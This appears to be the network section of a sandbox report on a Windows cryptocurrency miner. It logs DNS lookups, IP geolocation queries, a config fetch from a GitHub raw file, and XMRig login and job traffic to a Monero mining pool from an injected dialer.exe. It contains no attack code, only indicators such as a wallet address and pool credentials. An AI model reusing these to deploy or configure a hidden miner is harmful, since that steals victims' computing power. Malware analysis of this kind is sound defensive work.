Mar 1, 2024 15:23:01.244262934 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:23:08.094238997 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:23:08.244162083 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:23:10.468542099 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:23:10.556763887 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:23:32.066222906 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:23:32.259763956 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:23:36.016357899 CET	80	49748	208.95.112.1	192.168.2.4
Mar 1, 2024 15:23:54.095241070 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:23:54.259711027 CET	49731	443	192.168.2.4	142.202.242.43
Mar 1, 2024 15:24:01.089876890 CET	443	49731	142.202.242.43	192.168.2.4
Mar 1, 2024 15:24:01.244136095 CET	49731	443	192.168.2.4	142.202.242.43

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2024 15:22:00.142525911 CET	64385	53	192.168.2.4	1.1.1.1
Mar 1, 2024 15:22:00.233918905 CET	53	64385	1.1.1.1	192.168.2.4
Mar 1, 2024 15:22:01.718862057 CET	50848	53	192.168.2.4	1.1.1.1
Mar 1, 2024 15:22:01.806911945 CET	53	50848	1.1.1.1	192.168.2.4
Mar 1, 2024 15:22:10.789666891 CET	63417	53	192.168.2.4	1.1.1.1
Mar 1, 2024 15:22:10.886464119 CET	53	63417	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 1, 2024 15:22:00.142525911 CET	192.168.2.4	1.1.1.1	0x7d5f	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:01.718862057 CET	192.168.2.4	1.1.1.1	0xd7e4	Standard query (0)	raw.githubusercontent.com	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:10.789666891 CET	192.168.2.4	1.1.1.1	0x1b1f	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 1, 2024 15:22:00.233918905 CET	1.1.1.1	192.168.2.4	0x7d5f	No error (0)	ip-api.com	208.95.112.1	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:01.806911945 CET	1.1.1.1	192.168.2.4	0xd7e4	No error (0)	raw.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:01.806911945 CET	1.1.1.1	192.168.2.4	0xd7e4	No error (0)	raw.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:01.806911945 CET	1.1.1.1	192.168.2.4	0xd7e4	No error (0)	raw.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:01.806911945 CET	1.1.1.1	192.168.2.4	0xd7e4	No error (0)	raw.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:10.886464119 CET	1.1.1.1	192.168.2.4	0x1b1f	No error (0)	pool.hashvault.pro	142.202.242.45	A (IP address)	IN (0x0001)	false
Mar 1, 2024 15:22:10.886464119 CET	1.1.1.1	192.168.2.4	0x1b1f	No error (0)	pool.hashvault.pro	142.202.242.43	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

raw.githubusercontent.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49729	208.95.112.1	80	7748	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
Mar 1, 2024 15:22:00.341361046 CET	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 1, 2024 15:22:00.436213970 CET	474	IN	HTTP/1.1 200 OK Date: Fri, 01 Mar 2024 14:22:00 GMT Content-Type: application/json; charset=utf-8 Content-Length: 297 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
1	192.168.2.4	49732	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Mar 1, 2024 15:22:13.174366951 CET	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 1, 2024 15:22:13.269547939 CET	474	IN	HTTP/1.1 200 OK Date: Fri, 01 Mar 2024 14:22:12 GMT Content-Type: application/json; charset=utf-8 Content-Length: 297 Access-Control-Allow-Origin: * X-Ttl: 47 X-Rl: 43 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49748	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Mar 1, 2024 15:22:31.811541080 CET	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 1, 2024 15:22:31.938570023 CET	474	IN	HTTP/1.1 200 OK Date: Fri, 01 Mar 2024 14:22:31 GMT Content-Type: application/json; charset=utf-8 Content-Length: 297 Access-Control-Allow-Origin: * X-Ttl: 28 X-Rl: 42 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
3	192.168.2.4	49757	208.95.112.1	80

Timestamp	Bytes transferred	Direction	Data
Mar 1, 2024 15:22:39.991136074 CET	65	OUT	GET /json/ HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Mar 1, 2024 15:22:40.086672068 CET	474	IN	HTTP/1.1 200 OK Date: Fri, 01 Mar 2024 14:22:39 GMT Content-Type: application/json; charset=utf-8 Content-Length: 297 Access-Control-Allow-Origin: * X-Ttl: 20 X-Rl: 41 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 31 38 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 33 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 38 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 6f 72 67 22 3a 22 49 70 78 6f 22 2c 22 61 73 22 3a 22 41 53 31 37 34 20 43 6f 67 65 6e 74 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 22 2c 22 71 75 65 72 79 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 35 22 7d Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10118","lat":40.7123,"lon":-74.0068,"timezone":"America/New_York","isp":"Cogent Communications","org":"Ipxo","as":"AS174 Cogent Communications","query":"191.96.227.215"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	185.199.111.133	443	7748	C:\ProgramData\main.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-01 14:22:02 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
2024-03-01 14:22:02 UTC	889	IN	HTTP/1.1 200 OK Connection: close Content-Length: 38 Cache-Control: max-age=300 Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox Content-Type: text/plain; charset=utf-8 ETag: "4f6da874475e426b83a33a7a2607a5ab1b75bd149d959d2ec1fd6ad2989b1d21" Strict-Transport-Security: max-age=31536000 X-Content-Type-Options: nosniff X-Frame-Options: deny X-XSS-Protection: 1; mode=block X-GitHub-Request-Id: 5DAE:2FAB:22749E:2A3096:65E1E48A Accept-Ranges: bytes Date: Fri, 01 Mar 2024 14:22:02 GMT Via: 1.1 varnish X-Served-By: cache-ewr18134-EWR X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1709302922.162269,VS0,VE48 Vary: Authorization,Accept-Encoding,Origin Access-Control-Allow-Origin: * Cross-Origin-Resource-Policy: cross-origin X-Fastly-Request-ID: d0762a896cdcd6e410a7e130ab161ee02182c025 Expires: Fri, 01 Mar 2024 14:27:02 GMT Source-Age: 0
2024-03-01 14:22:02 UTC	38	IN	Data Raw: 32 2e 38 7c 70 70 36 71 54 75 50 48 37 63 45 4c 7a 4b 71 55 64 6f 48 75 43 66 41 32 32 67 61 4f 42 6d 4c 66 7c 0a Data Ascii: 2.8\|pp6qTuPH7cELzKqUdoHuCfA22gaOBmLf\|

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	142.202.242.43	443	1508	C:\Windows\System32\dialer.exe

Timestamp	Bytes transferred	Direction	Data
2024-03-01 14:22:12 UTC	598	OUT	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6c 6f 67 69 6e 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 6c 6f 67 69 6e 22 3a 22 34 36 36 42 66 4e 7a 4e 75 67 41 57 34 41 77 37 4e 47 39 34 50 6b 56 38 70 4d 35 4d 7a 74 6f 4a 71 59 58 78 35 65 66 53 43 73 44 67 55 64 56 50 6d 79 35 32 75 52 6a 63 70 4c 62 44 68 50 38 6d 33 45 36 42 4e 36 7a 6b 7a 4a 69 56 6a 43 56 72 57 36 7a 63 53 76 35 32 37 79 37 31 72 6a 39 22 2c 22 70 61 73 73 22 3a 22 6d 61 6d 6f 6e 74 36 22 2c 22 61 67 65 6e 74 22 3a 22 58 4d 52 69 67 2f 36 2e 31 39 2e 33 20 28 57 69 6e 64 6f 77 73 20 4e 54 20 31 30 2e 30 3b 20 57 69 6e 36 34 3b 20 78 36 34 29 20 6c 69 62 75 76 2f 31 2e 33 38 2e 30 20 6d 73 76 63 2f 32 30 32 32 22 2c 22 72 69 67 69 Data Ascii: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"466BfNzNugAW4Aw7NG94PkV8pM5MztoJqYXx5efSCsDgUdVPmy52uRjcpLbDhP8m3E6BN6zkzJiVjCVrW6zcSv527y71rj9","pass":"mamont6","agent":"XMRig/6.19.3 (Windows NT 10.0; Win64; x64) libuv/1.38.0 msvc/2022","rigi
2024-03-01 14:22:12 UTC	732	IN	Data Raw: 7b 22 69 64 22 3a 31 2c 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 65 72 72 6f 72 22 3a 6e 75 6c 6c 2c 22 72 65 73 75 6c 74 22 3a 7b 22 69 64 22 3a 22 31 61 64 65 34 61 36 66 2d 61 36 38 30 2d 34 61 33 37 2d 62 32 33 61 2d 66 62 65 37 65 35 65 32 36 62 62 39 22 2c 22 6a 6f 62 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 38 37 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 37 66 62 34 64 38 65 36 32 64 62 66 34 33 37 32 32 63 61 34 64 37 34 63 37 39 35 63 61 63 30 63 36 37 33 37 62 31 39 32 31 39 66 35 64 36 37 62 34 63 64 63 65 34 39 63 32 65 65 31 65 30 Data Ascii: {"id":1,"jsonrpc":"2.0","error":null,"result":{"id":"1ade4a6f-a680-4a37-b23a-fbe7e5e26bb9","job":{"blob":"101087c987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc945540000000017fb4d8e62dbf43722ca4d74c795cac0c6737b19219f5d67b4cdce49c2ee1e0
2024-03-01 14:22:22 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 39 64 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 39 34 36 39 37 30 32 33 62 34 35 37 37 35 65 64 64 65 62 65 65 65 36 31 62 64 37 33 65 34 36 34 64 64 30 31 66 34 66 65 65 31 30 31 37 30 63 65 32 36 65 33 64 37 39 64 34 35 34 38 30 33 34 36 30 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 64 36 37 62 35 34 65 2d 65 61 62 36 2d 34 32 34 62 2d 38 64 37 33 2d 66 30 36 35 62 32 37 39 38 35 33 36 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"10109dc987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc9455400000000194697023b45775eddebeee61bd73e464dd01f4fee10170ce26e3d79d454803460","job_id":"1d67b54e-eab6-424b-8d73-f065b2798536","ta
2024-03-01 14:22:44 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 33 63 39 38 37 61 66 30 36 38 32 35 32 31 39 35 35 62 32 61 30 63 31 66 33 63 31 37 64 66 34 31 64 37 64 31 39 36 62 30 30 65 64 65 30 66 65 30 65 64 63 65 32 61 35 38 32 30 30 35 38 36 36 34 37 66 62 63 39 34 35 35 34 30 30 30 30 30 30 30 30 31 66 61 66 65 66 30 63 33 66 32 64 30 63 36 39 34 30 65 33 31 31 64 34 36 33 32 32 63 39 61 65 35 65 62 61 35 63 36 36 35 33 35 31 37 38 36 38 33 64 33 35 63 37 32 64 36 64 36 34 34 31 62 36 36 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 62 31 37 36 61 30 34 63 2d 30 37 37 39 2d 34 32 33 36 2d 39 62 38 61 2d 61 35 39 65 35 38 31 62 37 65 38 38 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b3c987af0682521955b2a0c1f3c17df41d7d196b00ede0fe0edce2a58200586647fbc94554000000001fafef0c3f2d0c6940e311d46322c9ae5eba5c66535178683d35c72d6d6441b665","job_id":"b176a04c-0779-4236-9b8a-a59e581b7e88","ta
2024-03-01 14:22:46 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 36 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 33 63 61 31 37 37 65 62 63 63 36 33 61 36 39 30 36 36 39 39 63 66 31 35 37 39 32 63 34 64 35 65 36 37 64 62 36 66 35 34 38 37 34 32 34 33 37 63 39 63 65 66 33 61 34 66 35 38 63 63 32 61 36 30 30 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 31 35 31 37 64 66 32 38 2d 62 37 32 37 2d 34 61 62 39 2d 62 30 37 66 2d 64 61 64 63 65 63 38 33 63 31 64 61 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b6c987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d000000003ca177ebcc63a6906699cf15792c4d5e67db6f548742437c9cef3a4f58cc2a6005","job_id":"1517df28-b727-4ab9-b07f-dadcec83c1da","ta
2024-03-01 14:23:01 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 62 36 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 64 32 35 32 64 62 66 31 64 30 35 36 38 66 31 62 34 34 32 38 32 64 65 61 38 35 61 34 61 38 30 66 39 63 30 31 31 38 30 37 31 64 30 63 30 65 35 34 65 31 30 37 39 32 66 39 35 32 65 31 64 36 35 64 30 35 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 30 34 35 31 37 64 35 2d 32 61 63 30 2d 34 30 38 64 2d 38 66 62 34 2d 37 36 61 31 65 61 64 30 32 35 37 35 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010b6c987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d00000000d252dbf1d0568f1b44282dea85a4a80f9c0118071d0c0e54e10792f952e1d65d05","job_id":"304517d5-2ac0-408d-8fb4-76a1ead02575","ta
2024-03-01 14:23:08 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 62 63 39 38 37 61 66 30 36 66 66 39 62 62 38 61 66 38 30 36 61 30 65 64 62 34 62 38 30 66 30 37 30 33 62 30 30 61 65 33 64 66 65 36 61 61 61 65 35 31 61 31 38 65 34 39 65 36 64 35 30 34 61 64 33 31 30 61 35 62 31 33 64 30 30 30 30 30 30 30 30 62 32 64 39 31 61 32 62 31 36 63 66 39 63 33 38 37 38 61 37 38 61 37 39 34 65 36 62 66 30 62 38 34 39 65 63 64 36 38 66 61 39 63 65 30 64 65 63 38 61 31 38 61 61 31 39 33 64 36 34 30 34 35 36 30 64 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 64 37 37 37 61 30 62 65 2d 61 30 36 33 2d 34 32 34 36 2d 39 63 34 33 2d 32 35 66 36 33 37 64 62 63 39 65 38 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cbc987af06ff9bb8af806a0edb4b80f0703b00ae3dfe6aaae51a18e49e6d504ad310a5b13d00000000b2d91a2b16cf9c3878a78a794e6bf0b849ecd68fa9ce0dec8a18aa193d6404560d","job_id":"d777a0be-a063-4246-9c43-25f637dbc9e8","ta
2024-03-01 14:23:10 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 63 65 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 39 65 64 61 38 36 32 64 33 33 33 35 62 38 63 35 66 31 31 62 64 32 36 38 31 35 65 37 31 36 62 35 30 35 66 30 61 33 33 38 38 31 39 32 30 63 35 66 34 33 61 37 64 66 62 61 38 64 62 32 32 35 66 64 30 32 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 33 61 63 36 30 64 62 65 2d 64 37 63 38 2d 34 35 65 61 2d 38 36 31 66 2d 36 31 65 34 64 38 33 35 35 38 31 61 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010cec987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000009eda862d3335b8c5f11bd26815e716b505f0a33881920c5f43a7dfba8db225fd02","job_id":"3ac60dbe-d7c8-45ea-861f-61e4d835581a","ta
2024-03-01 14:23:32 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 65 33 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 33 62 63 64 64 33 66 30 35 35 61 33 61 33 35 39 35 64 36 36 30 61 63 33 34 65 37 66 38 39 66 36 37 36 39 66 62 61 39 38 37 38 39 35 30 63 63 33 34 39 34 36 32 33 39 66 35 62 32 64 36 39 31 37 30 36 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 63 35 35 34 38 36 37 31 2d 32 39 64 66 2d 34 66 34 35 2d 39 63 38 37 2d 63 32 31 61 62 36 66 62 34 37 39 33 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010e3c987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000003bcdd3f055a3a3595d660ac34e7f89f6769fba9878950cc34946239f5b2d691706","job_id":"c5548671-29df-4f45-9c87-c21ab6fb4793","ta
2024-03-01 14:23:54 UTC	471	IN	Data Raw: 7b 22 6a 73 6f 6e 72 70 63 22 3a 22 32 2e 30 22 2c 22 6d 65 74 68 6f 64 22 3a 22 6a 6f 62 22 2c 22 70 61 72 61 6d 73 22 3a 7b 22 62 6c 6f 62 22 3a 22 31 30 31 30 66 39 63 39 38 37 61 66 30 36 61 35 66 61 65 63 62 33 61 64 30 30 61 34 64 61 30 33 31 35 34 62 61 63 36 36 63 66 61 36 37 62 39 33 37 36 61 34 61 63 34 61 38 39 65 33 31 36 39 32 37 39 66 37 33 66 31 36 65 31 31 65 64 65 30 30 30 30 30 30 30 30 35 61 62 61 34 37 38 63 39 62 66 39 64 63 37 36 39 35 30 62 62 62 33 64 37 62 34 61 66 36 64 38 61 61 63 31 63 61 33 66 30 36 34 37 30 62 63 31 35 35 66 30 32 65 38 62 31 37 39 37 33 32 34 33 30 66 22 2c 22 6a 6f 62 5f 69 64 22 3a 22 61 39 37 61 61 63 32 66 2d 34 38 38 35 2d 34 35 38 34 2d 61 31 34 32 2d 66 33 62 31 30 33 33 63 33 31 66 65 22 2c 22 74 61 Data Ascii: {"jsonrpc":"2.0","method":"job","params":{"blob":"1010f9c987af06a5faecb3ad00a4da03154bac66cfa67b9376a4ac4a89e3169279f73f16e11ede000000005aba478c9bf9dc76950bbb3d7b4af6d8aac1ca3f06470bc155f02e8b179732430f","job_id":"a97aac2f-4885-4584-a142-f3b1033c31fe","ta

Session ID	Source IP	Source Port	Destination IP	Destination Port
2	192.168.2.4	49733	185.199.111.133	443

Timestamp	Bytes transferred	Direction	Data
2024-03-01 14:22:14 UTC	108	OUT	GET /attationin/Cloud/main/Milinfo.txt HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
